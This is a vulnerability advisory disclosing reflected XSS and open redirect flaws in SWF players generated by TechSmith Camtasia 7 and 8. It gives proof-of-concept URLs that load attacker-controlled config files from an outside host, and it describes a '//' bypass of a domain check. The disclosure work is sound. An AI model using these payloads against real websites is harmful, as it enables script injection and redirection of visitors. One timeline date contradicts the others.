TechSmith Camtasia 7 / 8 Cross Site Scripting

`Title: Reflected XSS in Flash files of TechSmith Camtasia 8 & 7  
Author: Soroush Dalili (@irsdl)  
Affected Software: TechSmith Camtasia v8.4.4 (latest 8.x) & v7.1.1 (latest  
7.x)  
Vendor URL: http://www.techsmith.com/camtasia-version-history.html  
Vendor Status: vulnerable  
CVE-ID: -  
  
Camtasia 8 (v8.4.4 (latest 8.x) - vulnerable):  
==============================================  
TechSmith Camtasia is a screen recorder and video editor. After version 8,  
it does not create SWF files that contain the video file. Instead, it  
creates a MP4 file with HTML5 and SWF players.  
  
However, SWF Player in version 8.4.3 (latest version at the time of  
testing) was vulnerable to a reflected XSS attack.  
After producing a Flash/HTML5 output, Camtasia creates the following flash  
file:  
ProjectName_controller.swf  
  
This file is vulnerable to Open Redirect and XSS by loading a config file  
that redirects the browser to an arbitrary destination after playing a  
video. The destination URL can be attacker's URL (such as "//attacker.com/")  
or a JavaScript that uses "javascript:" protocol.  
  
The following shows a PoC code:  
ProjectName_controller.swf?src=http://0me.me/demo/camtasia  
/small.mp4&xmp=//0me.me/demo/camtasia/camtasia_v8.xml  
  
This file can be found in any website that uses Camtasia projects for  
instance techsmith.com website:  
http://www.techsmith.com/includes/tsc_player.swf  
  
Camtasia 7 (v7.1.1 (latest 7.x) - vulnerable):  
==============================================  
An XSS issue was resolved previously in generated Flash files of Camtasia 7  
(http://web.appsec.ws/FlashExploitDatabase.php). TechSmith had patched this  
vulnerability by implementing the "safeDomainCheck" function that checks  
whether the domain is allowed or not in order to load the config file.  
However, this protection can be bypassed by using "//" instead of "http://"  
or "https://".  
  
PoC code is as follows:  
ProjectName_controller.swf?csConfigFile=//0me.me/demo/camtasia  
/camtasia_v7.xml&.swf  
  
Solution:  
=========  
Upgrade from Camtasia version 7 to 8. Use Camtasia HTML5 player instead of  
the Flash player in Camtasia v8 and remove the old Flash files from  
affected websites.  
  
Disclosure Timeline:  
====================  
04-Nov-2014 – discovered  
11-Nov-2014 – reported  
14-Nov-2014 – initial acknowledge of receiving the issue from the vendor  
17-Nov-2014 – the vendor confirmed that they know about these issues and  
they do not have any ETA to patch the issue  
18-Nov-2014 - the vendor confirmed that this issue can be publicly disclosed  
07-Jan-2014 - the vendor also confirmed that this issue can be reported to  
the security mail lists (double confirmation)!  
  
Credit:  
=======  
Vulnerability found by Soroush Dalili (@irsdl)  
  
  
`